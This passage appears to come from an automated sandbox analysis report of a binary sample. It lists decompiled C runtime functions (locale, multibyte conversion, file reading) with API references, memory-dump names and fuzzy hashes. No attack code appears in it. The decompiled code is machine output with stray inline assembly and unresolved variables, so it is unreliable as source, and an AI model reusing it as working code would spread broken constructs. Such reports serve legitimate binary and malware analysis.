									 *(_t98 - 4) = 0xfffffffe;
									E00EB78BB();
								}
								_t46 = E00EB2248(_t96);
							}
							return E00EAF225(_t46);
						}
					}
				}
			}





























                0x00ea5641
                0x00ea5641
                0x00ea5641
                0x00ea5641
                0x00ea5641
                0x00ea5641
                0x00ea5647
                0x00ea564d
                0x00ea5653
                0x00eb7659
                0x00eb765a
                0x00eb765b
                0x00eb765c
                0x00eb7665
                0x00eb765e
                0x00eb765e
                0x00eb765e
                0x00eb766a
                0x00eb766f
                0x00eb76c9
                0x00eb76ce
                0x00eb76cf
                0x00eb76d1
                0x00eb77ef
                0x00eb77f7
                0x00eb77f9
                0x00000000
                0x00eb77fb
                0x00eb7579
                0x00000000
                0x00eb7579
                0x00eb76d7
                0x00eb76e6
                0x00eb76eb
                0x00eb76ee
                0x00eb76f0
                0x00eb76fc
                0x00eb76fc
                0x00eb7702
                0x00eb76f2
                0x00eb76f2
                0x00eb76f8
                0x00eb76fa
                0x00000000
                0x00000000
                0x00eb76fa
                0x00eb770b
                0x00eb7713
                0x00eb7721
                0x00eb7726
                0x00eb7729
                0x00eb772b
                0x00000000
                0x00eb7731
                0x00eb7737
                0x00eb773c
                0x00eb773f
                0x00eb7741
                0x00000000
                0x00eb7747
                0x00eb7751
                0x00eb7756
                0x00eb7759
                0x00eb775b
                0x00000000
                0x00eb7761
                0x00eb7761
                0x00000000
                0x00eb7761
                0x00eb775b
                0x00eb7741
                0x00eb772b
                0x00eb7671
                0x00eb7677
                0x00eb767c
                0x00eb7684
                0x00eb7689
                0x00eb768e
                0x00eb7766
                0x00eb7766
                0x00eb7768
                0x00eb776b
                0x00eb7794
                0x00eb779a
                0x00eb779a
                0x00eb779c
                0x00000000
                0x00eb776d
                0x00eb776d
                0x00eb7773
                0x00eb7775
                0x00000000
                0x00eb7777
                0x00eb7781
                0x00eb7786
                0x00eb7789
                0x00eb778b
                0x00eb779f
                0x00eb779f
                0x00eb77a5
                0x00eb77a7
                0x00eb77b2
                0x00eb77b7
                0x00eb77b7
                0x00eb77ba
                0x00eb77c0
                0x00eb77cb
                0x00eb77d3
                0x00eb77d5
                0x00000000
                0x00eb77d7
                0x00eb757b
                0x00eb757e
                0x00eb757f
                0x00eb7580
                0x00eb7582
                0x00eb758b
                0x00eb758b
                0x00eb778d
                0x00eb778d
                0x00eb778e
                0x00eb778f
                0x00eb7790
                0x00eb7791
                0x00000000
                0x00eb7791
                0x00eb778b
                0x00eb7775
                0x00eb7694
                0x00eb76ad
                0x00eb76b2
                0x00eb76b7
                0x00000000
                0x00eb76bd
                0x00eb7800
                0x00eb7802
                0x00eb7803
                0x00eb7804
                0x00eb7805
                0x00eb7806
                0x00eb7807
                0x00eb7807
                0x00eb780c
                0x00eb780d
                0x00eb780f
                0x00eb7814
                0x00eb7819
                0x00eb781e
                0x00eb7826
                0x00eb782c
                0x00eb7830
                0x00eb7835
                0x00eb783a
                0x00eb783e
                0x00eb784c
                0x00eb7851
                0x00eb7851
                0x00eb783e
                0x00eb7852
                0x00eb7859
                0x00eb7861
                0x00eb7865
                0x00eb786b
                0x00eb7874
                0x00eb787a
                0x00eb787e
                0x00eb788d
                0x00eb7892
                0x00eb7893
                0x00eb789a
                0x00eb789a
                0x00eb78a0
                0x00eb78a5
                0x00eb78ab
                0x00eb78ab
                0x00eb76b7
                0x00eb768e

                APIs
                • ___get_qualified_locale_downlevel.LIBCMT ref: 00EB765E
                  • Part of subcall function 00EBEA44: _memset.LIBCMT ref: 00EBEA7A
                  • Part of subcall function 00EBEA44: GetUserDefaultLCID.KERNEL32(?,?,00000055), ref: 00EBEB5D
                  • Part of subcall function 00EBEA44: IsValidCodePage.KERNEL32(00000000), ref: 00EBEBB1
                  • Part of subcall function 00EBEA44: IsValidLocale.KERNEL32(?,00000001), ref: 00EBEBC4
                  • Part of subcall function 00EBEA44: ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 00EBEBE3
                  • Part of subcall function 00EBEA44: ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 00EBEBFE
                  • Part of subcall function 00EBEA44: GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 00EBEC17
                  • Part of subcall function 00EBEA44: GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00EBEC2E
                • ___get_qualified_locale.LIBCMT ref: 00EB7665
                • __invoke_watson.LIBCMT ref: 00EB7807
                • __lock.LIBCMT ref: 00EB7826
                • _free.LIBCMT ref: 00EB784C
                • __lock.LIBCMT ref: 00EB7865
                • ___removelocaleref.LIBCMT ref: 00EB7874
                • ___freetlocinfo.LIBCMT ref: 00EB788D
                • _free.LIBCMT ref: 00EB78A0
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Locale$DownlevelInfoNameValid___crt__lock_free$CodeDefaultPageUser___freetlocinfo___get_qualified_locale___get_qualified_locale_downlevel___removelocaleref__invoke_watson_memset
                • String ID:
                • API String ID: 326597126-0
                • Opcode ID: 74ceaa93ed26513bf724ab8611d67c8cecb507a695a828ee7681fd132f52846a
                • Instruction ID: 225c511abe74d94d6a60d0bfd0a376a575d76ec378454b8244fe096110d399d4
                • Opcode Fuzzy Hash: 74ceaa93ed26513bf724ab8611d67c8cecb507a695a828ee7681fd132f52846a
                • Instruction Fuzzy Hash: A6313971509315AADB38ABA09D0AFEB33E8AF80314F18356EF494B69D2CF35DE41C651
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA6AE0 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E00EA6AE0(void* __ecx, signed int __edx) {
				intOrPtr _t44;
				void* _t56;
				void* _t62;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				intOrPtr _t78;
				signed int _t83;
				void* _t84;

				_t76 = __edx;
				_t62 = E00EB22C8(__ecx, __edx);
				_t87 = _t62;
				if(_t62 == 0) {
					L24:
					return E00EAF225(_t78);
				} else {
					memcpy(_t62,  *( *((intOrPtr*)(_t84 - 0x20)) + 0x68), 0x88 << 2);
					_t83 = 0;
					 *_t62 = 0;
					_t78 = E00EB48E9(_t76,  *( *((intOrPtr*)(_t84 - 0x20)) + 0x68) + 0x110, _t87,  *((intOrPtr*)(_t84 + 8)), _t62);
					 *((intOrPtr*)(_t84 + 8)) = _t78;
					if(_t78 != 0) {
						__eflags = _t78 - 0xffffffff;
						if(_t78 == 0xffffffff) {
							__eflags = _t62 - 0xeceac8;
							if(_t62 != 0xeceac8) {
								E00EB2248(_t62);
							}
							 *((intOrPtr*)(E00EAF100())) = 0x16;
						}
						goto L24;
					}
					_t44 =  *((intOrPtr*)(_t84 - 0x20));
					_t70 =  *(_t44 + 0x68);
					asm("lock xadd [ecx], edx");
					if((_t76 | 0xffffffff) == 0) {
						_t70 =  *(_t44 + 0x68);
						if( *(_t44 + 0x68) != 0xeceac8) {
							E00EB2248(_t70);
							_pop(_t70);
							_t44 =  *((intOrPtr*)(_t84 - 0x20));
						}
					}
					 *(_t44 + 0x68) = _t62;
					asm("lock xadd [ebx], eax");
					if(( *( *((intOrPtr*)(_t84 - 0x20)) + 0x70) & 0x00000002) == 0 && ( *0xecee10 & 0x00000001) == 0) {
						E00EB20A9(_t70, 0xd);
						 *(_t84 - 4) = _t83;
						 *0xecfcd4 =  *((intOrPtr*)(_t62 + 4));
						 *0xecfcd8 =  *((intOrPtr*)(_t62 + 8));
						 *0xecfce8 =  *((intOrPtr*)(_t62 + 0x21c));
						_t72 = _t83;
						while(1) {
							 *(_t84 - 0x1c) = _t72;
							if(_t72 >= 5) {
								break;
							}
							 *((short*)(0xecfcdc + _t72 * 2)) =  *((intOrPtr*)(_t62 + 0xc + _t72 * 2));
							_t72 = _t72 + 1;
						}
						_t73 = _t83;
						while(1) {
							 *(_t84 - 0x1c) = _t73;
							__eflags = _t73 - 0x101;
							if(_t73 >= 0x101) {
								goto L14;
							}
							 *((char*)(_t73 + 0xece8c0)) =  *((intOrPtr*)(_t73 + _t62 + 0x18));
							_t73 = _t73 + 1;
						}
						while(1) {
							L14:
							 *(_t84 - 0x1c) = _t83;
							__eflags = _t83 - 0x100;
							if(_t83 >= 0x100) {
								break;
							}
							 *((char*)(_t83 + 0xece9c8)) =  *((intOrPtr*)(_t83 + _t62 + 0x119));
							_t83 = _t83 + 1;
						}
						__eflags = _t73 | 0xffffffff;
						asm("lock xadd [eax], ecx");
						if((_t73 | 0xffffffff) == 0) {
							_t56 =  *0xececec; // 0xeceac8
							__eflags = _t56 - 0xeceac8;
							if(_t56 != 0xeceac8) {
								E00EB2248(_t56);
							}
						}
						 *0xececec = _t62;
						asm("lock xadd [ebx], eax");
						 *(_t84 - 4) = 0xfffffffe;
						E00EB48B3();
					}
					goto L24;
				}
			}












                0x00ea6ae0
                0x00eb4782
                0x00eb4784
                0x00eb4786
                0x00eb48e1
                0x00eb48e8
                0x00eb478c
                0x00eb4799
                0x00eb479b
                0x00eb479d
                0x00eb47aa
                0x00eb47ac
                0x00eb47b1
                0x00eb48be
                0x00eb48c1
                0x00eb48c3
                0x00eb48c9
                0x00eb48cc
                0x00eb48d1
                0x00eb48d7
                0x00eb48d7
                0x00000000
                0x00eb48c1
                0x00eb47b7
                0x00eb47ba
                0x00eb47c0
                0x00eb47c4
                0x00eb47c6
                0x00eb47cf
                0x00eb47d2
                0x00eb47d7
                0x00eb47d8
                0x00eb47d8
                0x00eb47cf
                0x00eb47db
                0x00eb47e1
                0x00eb47ec
                0x00eb4801
                0x00eb4807
                0x00eb480d
                0x00eb4815
                0x00eb4820
                0x00eb4825
                0x00eb4827
                0x00eb4827
                0x00eb482d
                0x00000000
                0x00000000
                0x00eb4834
                0x00eb483c
                0x00eb483c
                0x00eb483f
                0x00eb4841
                0x00eb4841
                0x00eb4844
                0x00eb484a
                0x00000000
                0x00000000
                0x00eb4850
                0x00eb4856
                0x00eb4856
                0x00eb4859
                0x00eb4859
                0x00eb4859
                0x00eb485c
                0x00eb4862
                0x00000000
                0x00000000
                0x00eb486b
                0x00eb4871
                0x00eb4871
                0x00eb4879
                0x00eb487c
                0x00eb4880
                0x00eb4882
                0x00eb4887
                0x00eb488c
                0x00eb488f
                0x00eb4894
                0x00eb488c
                0x00eb4895
                0x00eb489e
                0x00eb48a2
                0x00eb48a9
                0x00eb48a9
                0x00000000
                0x00eb47ec

                APIs
                • __malloc_crt.LIBCMT ref: 00EB477C
                  • Part of subcall function 00EB22C8: _malloc.LIBCMT ref: 00EB22D9
                • __setmbcp_nolock.LIBCMT ref: 00EB47A3
                  • Part of subcall function 00EB48E9: getSystemCP.LIBCMT ref: 00EB4901
                  • Part of subcall function 00EB48E9: setSBCS.LIBCMT ref: 00EB490E
                • _free.LIBCMT ref: 00EB47D2
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • __lock.LIBCMT ref: 00EB4801
                • _free.LIBCMT ref: 00EB488F
                • _free.LIBCMT ref: 00EB48CC
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLastSystem__lock__malloc_crt__setmbcp_nolock_malloc
                • String ID:
                • API String ID: 3263399035-0
                • Opcode ID: 95653d2b22185e1ec2de5d8aaff2f1006cb9be2cd416f85251df426ea65378ee
                • Instruction ID: 5b47843d5672c3e6c1e9ddbe36e0649cf0816162a67ac3f501faebf8120e6b0e
                • Opcode Fuzzy Hash: 95653d2b22185e1ec2de5d8aaff2f1006cb9be2cd416f85251df426ea65378ee
                • Instruction Fuzzy Hash: 9D41DAB4A002848FDB19DF68D481AEA77E4BB05324B14516DF955BB7E3CB359C42CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA6B5A Relevance: 9.0, APIs: 6, Instructions: 47COMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E00EA6B5A(void* __edx, void* __esi, void* __eflags) {
				void* _t8;
				void* _t9;
				void* _t10;

				_t9 = __esi;
				_t8 = __edx;
				asm("loopne 0xffffff8b");
				if(__eflags != 0) {
					E00EB0A4B();
				} else {
					if( *((intOrPtr*)(_t10 - 0x1c)) == 0) {
						E00EB0ADE(__esi);
					}
					E00EB0A3C(_t8);
				}
				 *((intOrPtr*)(_t10 - 4)) = 0xfffffffe;
				return E00EAF225(_t9);
			}






                0x00ea6b5a
                0x00ea6b5a
                0x00eae8fc
                0x00eae8fe
                0x00eae8dc
                0x00eae900
                0x00eae904
                0x00eae907
                0x00eae907
                0x00eae90c
                0x00eae90c
                0x00eae911
                0x00eae91f

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __amsg_exit$__cinit__wsetenvp__wwincmdln_doexit
                • String ID:
                • API String ID: 2587630013-0
                • Opcode ID: 344c1ff1ac66235cbc6626bc53989c47ba6ee416d5cb28026ab77ac35ced7a00
                • Instruction ID: d097b58567ac583a1fbb4bc13346af363cfbc39e784798e3def6faa5e6ee9351
                • Opcode Fuzzy Hash: 344c1ff1ac66235cbc6626bc53989c47ba6ee416d5cb28026ab77ac35ced7a00
                • Instruction Fuzzy Hash: EEF0C230A0031268DA2877B15C03BEF25C45F1B365F1438A5F805FE2C3DE58FA414266
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EBA436 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00EBA436(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00EB2DB9( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00EBA1C7( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00EAF100();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                0x00eba43e
                0x00eba443
                0x00eba45d
                0x00000000
                0x00eba45d
                0x00eba445
                0x00eba44a
                0x00000000
                0x00000000
                0x00eba44f
                0x00eba46c
                0x00eba471
                0x00eba474
                0x00eba47b
                0x00eba49a
                0x00eba4a1
                0x00eba4a3
                0x00eba4e7
                0x00eba4f3
                0x00eba4f6
                0x00eba4fb
                0x00eba4fe
                0x00eba504
                0x00eba506
                0x00eba516
                0x00eba516
                0x00eba51a
                0x00eba51c
                0x00eba51f
                0x00eba51f
                0x00eba51f
                0x00eba51f
                0x00000000
                0x00eba525
                0x00eba508
                0x00eba508
                0x00eba50d
                0x00eba50d
                0x00eba510
                0x00000000
                0x00eba510
                0x00eba4a5
                0x00eba4a8
                0x00eba4ac
                0x00eba4d5
                0x00eba4d5
                0x00eba4d5
                0x00eba4d8
                0x00eba4d8
                0x00000000
                0x00000000
                0x00eba4da
                0x00eba4de
                0x00000000
                0x00000000
                0x00eba4e0
                0x00eba4e0
                0x00eba4e0
                0x00000000
                0x00eba4e0
                0x00eba4ae
                0x00eba4ae
                0x00eba4b1
                0x00000000
                0x00000000
                0x00eba4b5
                0x00eba4bf
                0x00eba4c5
                0x00eba4c8
                0x00eba4ce
                0x00eba4d1
                0x00eba4d3
                0x00000000
                0x00000000
                0x00000000
                0x00eba4d3
                0x00eba47d
                0x00eba480
                0x00eba482
                0x00eba487
                0x00eba487
                0x00eba48c
                0x00000000
                0x00eba48c
                0x00eba451
                0x00eba456
                0x00eba45a
                0x00eba45a
                0x00000000

                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EBA46C
                • __isleadbyte_l.LIBCMT ref: 00EBA49A
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00EBA4C8
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00EBA4FE
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID: >,
                • API String ID: 3058430110-1189350311
                • Opcode ID: a975d527b8109d81b9a55d9f50db0c0c35dda6eb7e6c78e679fadb0cb3c61c5c
                • Instruction ID: 3f7fa0d411fbacbc6bf87f3495abeb898d0c7c80f3767f1aabdf3aa844e6c0e9
                • Opcode Fuzzy Hash: a975d527b8109d81b9a55d9f50db0c0c35dda6eb7e6c78e679fadb0cb3c61c5c
                • Instruction Fuzzy Hash: 9831CF30600246AFDF218F65C848BFB7BA5FF41314F199139F865A7190E770E950DB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB721D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 60%
                			E00EB721D(void* __ebx, void* __edi, intOrPtr _a4) {
				char* _v24;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				short _v300;
				void* __esi;
				void* _t15;
				void* _t17;
				signed int _t20;
				char* _t22;
				signed int _t30;
				void* _t33;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t51;
				signed int _t52;

				if(_a4 != 0) {
					_push(__ebx);
					_t30 = E00EBDBB1(_a4, 0x55);
					_pop(_t33);
					if(_t30 < 0x55) {
						_push(__edi);
						_t15 = E00EB22C8(_t33, _t40, 2 + _t30 * 2);
						_t42 = _t15;
						if(_t42 != 0) {
							_t5 = _t30 + 1; // 0x1
							_t17 = L00EB5727(_t42, _t5, _a4, _t5);
							_t52 = _t51 + 0x10;
							if(_t17 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00EAEB49(_t30, _t40);
								asm("int3");
								_t49 = _t47;
								_push(_t49);
								_t50 = _t52;
								_t20 =  *0xece400; // 0xbb40e64e
								_v40 = _t20 ^ _t52;
								_t22 = _v24;
								_t45 = _v28;
								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
									E00EB7973(_t30, _t40, _t45,  &_v300);
								}
								_pop(_t46);
								return E00EB1E0D(_t30, _v36 ^ _t50, _t40, _t42, _t46);
							} else {
								_t15 = _t42;
								goto L5;
							}
						} else {
							L5:
							goto L6;
						}
					} else {
						_t15 = 0;
						L6:
						return _t15;
					}
				} else {
					return 0;
				}
			}






















                0x00eb7224
                0x00eb722a
                0x00eb7235
                0x00eb7238
                0x00eb723c
                0x00eb7249
                0x00eb724b
                0x00eb7250
                0x00eb7255
                0x00eb725b
                0x00eb7264
                0x00eb7269
                0x00eb726e
                0x00eb7276
                0x00eb7277
                0x00eb7278
                0x00eb7279
                0x00eb727a
                0x00eb727b
                0x00eb7280
                0x00eb7284
                0x00eb74b4
                0x00eb74b5
                0x00eb74bd
                0x00eb74c4
                0x00eb74c7
                0x00eb74cb
                0x00eb74d1
                0x00eb74fc
                0x00eb7502
                0x00eb750c
                0x00eb7515
                0x00eb7270
                0x00eb7270
                0x00000000
                0x00eb7270
                0x00eb7257
                0x00eb7257
                0x00000000
                0x00eb7257
                0x00eb723e
                0x00eb723e
                0x00eb7258
                0x00eb725a
                0x00eb725a
                0x00eb7226
                0x00eb7229
                0x00eb7229

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: 23e1c046823912b29c524a230eda23809f47ca41349b5e50e374bef1e01f98c7
                • Instruction ID: 622e5a34df4c7055181c6a58499c0bb5ece341e994d90cad7854b7bdbad77b6c
                • Opcode Fuzzy Hash: 23e1c046823912b29c524a230eda23809f47ca41349b5e50e374bef1e01f98c7
                • Instruction Fuzzy Hash: 76212B7120C208AEEB109A649C46FFB33ECDBC5764F505565F948F6990FA61EE008690
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA622B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87fileCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E00EA622B(signed int __ebx, signed int __edx, intOrPtr* __edi, signed int __esi) {
				intOrPtr _t83;
				signed char _t84;
				intOrPtr _t86;
				signed int _t87;
				signed char _t89;
				signed int _t90;
				signed int _t92;
				long _t100;
				signed int _t105;
				char _t106;
				char _t107;
				signed int _t109;
				char* _t113;
				void* _t114;
				void* _t117;
				void* _t118;
				void* _t119;
				signed int _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				intOrPtr _t129;
				signed int _t136;
				signed int _t138;
				intOrPtr* _t140;
				signed int _t142;
				char* _t144;
				signed int _t145;
				signed char* _t147;
				int _t148;
				signed int _t149;
				void* _t150;
				void* _t152;
				void* _t165;

				_t145 = __esi;
				_t140 = __edi;
				_t136 = __edx;
				_t122 = __ebx;
				while(1) {
					L12:
					_t140 = _t140 + 1;
					if(ReadFile( *( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122), _t150 - 1, 1, _t150 - 0x14, 0) != 0 || GetLastError() == 0) {
						goto L14;
					}
					L29:
					_t136 =  *(_t150 - 0xc);
					_t126 = 0xd;
					 *_t145 = _t126;
					_t145 = _t145 + 1;
					L24:
					while(_t140 <  *((intOrPtr*)(_t150 - 0x1c))) {
						_t83 =  *_t140;
						__eflags = _t83 - 0x1a;
						if(_t83 == 0x1a) {
							_t127 =  *((intOrPtr*)(0xecf230 + _t136 * 4));
							_t84 =  *(_t127 + _t122 + 4);
							__eflags = _t84 & 0x00000040;
							if((_t84 & 0x00000040) != 0) {
								 *_t145 =  *_t140;
								_t145 = _t145 + 1;
								__eflags = _t145;
							} else {
								 *(_t127 + _t122 + 4) = _t84 | 0x00000002;
							}
						} else {
							__eflags = _t83 - _t126;
							if(_t83 == _t126) {
								__eflags = _t140 -  *((intOrPtr*)(_t150 - 0x1c)) - 1;
								if(_t140 >=  *((intOrPtr*)(_t150 - 0x1c)) - 1) {
									goto L12;
								} else {
									_t113 = _t140 + 1;
									__eflags =  *_t113 - 0xa;
									if( *_t113 != 0xa) {
										 *_t145 = _t126;
										_t140 = _t113;
										_t145 = _t145 + 1;
									} else {
										_t114 = 0xa;
										_t140 = _t140 + 2;
										 *_t145 = _t114;
										L28:
										_t145 = _t145 + 1;
									}
								}
							} else {
								 *_t145 = _t83;
								_t145 = _t145 + 1;
								_t140 = _t140 + 1;
							}
							continue;
						}
						L33:
						_t38 = _t150 - 0x10; // 0xeb2b47
						_t86 =  *_t38;
						_t142 = _t145 - _t86;
						if( *((char*)(_t150 + 0x13)) != 1 || _t142 == 0) {
							L58:
							_t123 =  *(_t150 - 0x18);
						} else {
							_t147 = _t145 - 1;
							_t89 =  *_t147;
							if(_t89 < 0) {
								_t90 = _t89 & 0x000000ff;
								_t138 = 1;
								__eflags =  *((char*)(_t90 + 0xece408));
								if( *((char*)(_t90 + 0xece408)) == 0) {
									_t41 = _t150 - 0x10; // 0xeb2b47
									_t125 =  *_t41;
									while(1) {
										__eflags = _t138 - 4;
										if(_t138 > 4) {
											break;
										}
										__eflags = _t147 - _t125;
										if(_t147 >= _t125) {
											_t147 = _t147 - 1;
											_t138 = _t138 + 1;
											_t109 =  *_t147 & 0x000000ff;
											__eflags =  *((char*)(_t109 + 0xece408));
											if( *((char*)(_t109 + 0xece408)) == 0) {
												continue;
											}
										}
										break;
									}
									_t122 =  *(_t150 - 0x24);
								}
								_t92 =  *((char*)(( *_t147 & 0x000000ff) + 0xece408));
								__eflags = _t92;
								if(_t92 != 0) {
									__eflags = _t92 + 1 - _t138;
									if(_t92 + 1 != _t138) {
										_t129 =  *((intOrPtr*)(0xecf230 +  *(_t150 - 0xc) * 4));
										__eflags =  *(_t129 + _t122 + 4) & 0x00000048;
										if(__eflags == 0) {
											asm("cdq");
											L00EB3F56(_t129, __eflags,  *((intOrPtr*)(_t150 + 8)),  ~_t138,  ~_t138, 1);
											_t152 = _t152 + 0x10;
										} else {
											_t149 =  &(_t147[1]);
											 *((char*)(_t129 + _t122 + 5)) =  *_t147;
											_t105 =  *(_t150 - 0xc);
											__eflags = _t138 - 2;
											if(_t138 >= 2) {
												_t107 =  *_t149;
												_t149 = _t149 + 1;
												__eflags = _t149;
												 *((char*)( *((intOrPtr*)(0xecf230 + _t105 * 4)) + _t122 + 0x25)) = _t107;
												_t105 =  *(_t150 - 0xc);
											}
